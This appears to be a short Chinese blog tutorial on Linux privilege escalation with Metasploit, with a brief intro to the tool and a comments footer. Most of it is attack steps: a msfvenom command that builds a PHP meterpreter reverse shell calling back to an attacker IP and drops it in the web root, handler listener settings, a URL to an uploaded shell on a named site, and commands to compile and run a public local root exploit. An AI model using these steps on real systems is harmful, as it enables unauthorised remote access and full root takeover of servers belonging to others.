提权教程:metasploit linux提权

摘要

1、简介

Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。
2、使用metasploit linux提权

生成攻击载荷

msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.0.134 LPORT=12345 -f raw > /var/www/html/shell.php


本地监听

use exploit/multi/handler

set payload php/meterpreter_reverse_tcp

set lhost 192.168.0.134

set lport 12345

exploit


shel.php 的内容

1.png反弹shell

http://www.moontester.com//upload/shellx.php

在metasploit设置好监听模块 访问shellx.php 就会获取一个session

 2.png

3png.png

3、提权命令

 

getuid 查看当前用户

shell 使用终端

https://www.exploit-db.com/exploits/37292

gcc 37292.c -o exp

chmod +x exp

./exp


如果成功就会得到一个root

 4.png

目前评论:0 条

发表评论